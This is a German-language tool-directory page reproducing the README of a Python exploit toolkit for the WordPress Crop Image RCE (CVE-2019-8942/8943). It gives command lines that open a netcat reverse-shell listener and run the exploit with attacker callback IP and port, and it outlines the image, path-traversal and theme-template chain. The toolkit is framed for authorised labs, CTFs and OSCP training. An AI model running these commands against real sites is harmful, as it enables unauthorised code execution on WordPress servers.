Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
WordPress-RCE-CVE-2019-8942 — Python-Exploit-Toolkit für WordPress Crop Image RCE — CVE-2019-8942 & CVE-2019-8943 | Kitploit
Tools/GitHubGitHub/speatx/wordpress-rce-cve-2019-8942
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungRed TeamingPayload-EntwicklungLabs & Praxis
GitHubspeatx/wordpress-rce-cve-2019-8942

WordPress-RCE-CVE-2019-8942

Python-Exploit-Toolkit für WordPress Crop Image RCE — CVE-2019-8942 & CVE-2019-8943

Repository anzeigen
16vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WordPress Crop Image RCE — CVE-2019-8942 / CVE-2019-8943

Python3-Implementierung der authentifizierten WordPress-Crop-Image-Exploit-Kette. Das Repository ist um zwei unabhängige Arbeitsabläufe organisiert: ein manuelles OSCP-Skript und ein vollautomatisches Skript mit integriertem Reverse-Shell-Handler.

Verwenden Sie dies nur in autorisierten Laboren, CTFs, Trainingsplattformen oder Systemen, für die Sie eine ausdrückliche Erlaubnis zum Testen haben.


Betroffene WordPress-Versionen

Die Exploit-Kette zielt auf die Schwachstellen mit folgenden Tracking-IDs ab:

  • CVE-2019-8942
  • CVE-2019-8943

Das öffentliche Metasploit-Modul für diese Schwachstelle beschreibt die betroffenen Versionen wie folgt:

WordPress 5.0.0 und WordPress <= 4.9.8

Ein gültiges WordPress-Konto mit Berechtigungen zum Hochladen/Bearbeiten von Medien ist erforderlich. In vielen Laborumgebungen reicht ein Benutzer auf Autoren-Ebene aus.


Repository-Struktur

.
├── autoexploit.py
├── exploit_oscp.py
├── image.jpg
├── README.md
└── requirements.txt

image.jpg ist der standardmäßige JPG-Träger, der vom OSCP-Skript verwendet wird. Er ist enthalten, damit der manuelle Arbeitsablauf sofort funktioniert, ohne dass ein zufälliges Bild gesucht werden muss.

autoexploit.py ist in sich geschlossen und enthält intern einen eigenen hexadezimalen JPG-Träger, kann aber auch mit -i einen benutzerdefinierten JPG akzeptieren.


Installation

python3 -m pip install -r requirements.txt

Das einzige benötigte Python-Paket ist:

requests

Wenn Sie SOCKS-Proxy-Unterstützung wünschen, installieren Sie requests mit SOCKS-Erweiterungen in Ihrer Umgebung:

python3 -m pip install 'requests[socks]'

Skriptauswahl

SkriptAm besten geeignet fürBildverarbeitungShell-Handling
exploit_oscp.pyOSCP-artige/manuelle AusnutzungVerwendet standardmäßig image.jpg oder -i custom.jpgSie starten nc manuell
autoexploit.pySchnelle Labornutzung und wiederholte TestsVerwendet standardmäßig ein eingebettetes hex JPG oder -i custom.jpgStartet den Listener, löst Callbacks aus und öffnet eine interaktive Konsole

Beide Skripte sind eigenständig. Keines importiert Code vom anderen.


OSCP-ähnlicher Arbeitsablauf

exploit_oscp.py hält den Arbeitsablauf explizit. Es bereitet den Bildträger vor, führt die authentifizierte WordPress-Exploit-Kette aus, bestätigt die Befehlsausführung und löst eine Reverse Shell zu dem von Ihnen manuell gestarteten Listener aus.

Es startet keinen Handler automatisch und verwendet kein Metasploit, Meterpreter oder msfvenom.

Grundlegende OSCP-Nutzung

Starten Sie zuerst Ihren Listener:

nc -lvnp 443

Führen Sie den Exploit mit dem standardmäßigen image.jpg aus:

python3 exploit_oscp.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443

OSCP-Nutzung mit einem benutzerdefinierten JPG

nc -lvnp 443
python3 exploit_oscp.py -t http://target.local/ -u username -p password -i ./custom.jpg --lhost 10.10.14.8 --lport 443

OSCP-Optionen

OptionErforderlichStandardBedeutung
-t, --targetJaKeinerZiel-WordPress-Basis-URL, z. B. http://target.local/
-u, --usernameJaKeinerWordPress-Benutzername
-p, --passwordJaKeinerWordPress-Passwort
-i, --imageNeinimage.jpgJPG-Träger zum Vorbereiten und Hochladen
--lhostJaKeinerIhre Callback-IP, normalerweise Ihre VPN-/tun0-IP
--lportJaKeinerPort, auf dem Ihr manueller Listener lauscht
--proxyNeinKeinerProxy-URL, z. B. http://127.0.0.1:8080 oder socks5://127.0.0.1:9050
--user-agentNeinEingebautBenutzerdefinierter User-Agent-Header
--random-user-agentNeinDeaktiviertVerwendet einen zufälligen browserähnlichen User-Agent
--timeoutNein20HTTP-Timeout in Sekunden
--debugNeinDeaktiviertHTTP-Debug-Ausgabe ausgeben und nützliche fehlgeschlagene Antworten speichern

OSCP-Beispiel mit Burp

python3 exploit_oscp.py -t http://target.local/ -u username -p password -i ./image.jpg --lhost 10.10.14.8 --lport 443 --proxy http://127.0.0.1:8080

Vollautomatischer Arbeitsablauf

autoexploit.py ist auf Geschwindigkeit ausgelegt. Es kann nur mit Ziel-Anmeldeinformationen ausgeführt werden und versucht, die Callback-IP und den Listener-Port automatisch auszuwählen.

Es führt den vollständigen Exploit-Ablauf durch, startet einen lokalen Listener, probiert mehrere Reverse-Shell-Payload-Stile aus und öffnet eine sauberere interaktive Konsole mit farbigen lokalen Statusmeldungen und leiser TTY-Upgrade-Behandlung.

Grundlegende automatisierte Nutzung

python3 autoexploit.py -t http://target.local/ -u username -p password

Automatisierte Nutzung mit expliziten Callback-Werten

python3 autoexploit.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443

Automatisierte Nutzung mit benutzerdefiniertem Bild und Proxy

python3 autoexploit.py -t http://target.local/ -u username -p password -i ./image.jpg --proxy http://127.0.0.1:8080

Automatisierte Optionen

OptionErforderlichStandardBedeutung
-t, --targetJaKeinerZiel-WordPress-Basis-URL
-u, --usernameJaKeinerWordPress-Benutzername
-p, --passwordJaKeinerWordPress-Passwort
-i, --imageNeinEingebettetes hex JPGOptionaler benutzerdefinierter JPG-Träger
--lhostNeinAutomatisch erkanntCallback-IP, die von der Reverse Shell verwendet wird
--lportNeinFreier lokaler PortLokaler Listener-Port
--listen-timeoutNein12Sekunden, die auf jeden Reverse-Shell-Versuch gewartet wird
--proxyNeinKeinerProxy-URL, z. B. http://127.0.0.1:8080 oder socks5://127.0.0.1:9050
--user-agentNeinEingebautBenutzerdefinierter User-Agent-Header
--random-user-agentNeinDeaktiviertVerwendet einen zufälligen browserähnlichen User-Agent
--timeoutNein20HTTP-Timeout in Sekunden
--debugNeinDeaktiviertHTTP-Debug-Ausgabe ausgeben und nützliche fehlgeschlagene Antworten speichern

Proxy- und User-Agent-Beispiele

HTTP-Proxy über Burp:

python3 autoexploit.py -t http://target.local/ -u username -p password --proxy http://127.0.0.1:8080

SOCKS-Proxy:

python3 autoexploit.py -t http://target.local/ -u username -p password --proxy socks5://127.0.0.1:9050

Benutzerdefinierter User-Agent:

python3 exploit_oscp.py -t http://target.local/ -u username -p password --lhost 10.10.14.8 --lport 443 --user-agent "Mozilla/5.0 Custom"

Zufälliger User-Agent:

python3 autoexploit.py -t http://target.local/ -u username -p password --random-user-agent

Warum das Bild wichtig ist

Dies ist kein normaler PHP-Upload. WordPress erwartet Bildinhalt, verarbeitet die Datei über den Media-Editor und erstellt ein zugeschnittenes Bild. Die Exploit-Kette missbraucht dann Anhangs-Metadaten und Path Traversal, um ein zugeschnittenes Bild im aktiven Theme-Verzeichnis zu platzieren. Schließlich wird die zugeschnittene Datei als Seitenvorlage referenziert, sodass WordPress sie als PHP einbindet.

Ein zufälliges JPG mit PHP in fragilen EXIF-Metadaten kann fehlschlagen, weil GD während der Zuschneideverarbeitung Metadaten entfernen oder neu codieren kann. Dieses Repository hält den Arbeitsablauf klar:

Tool herunterladen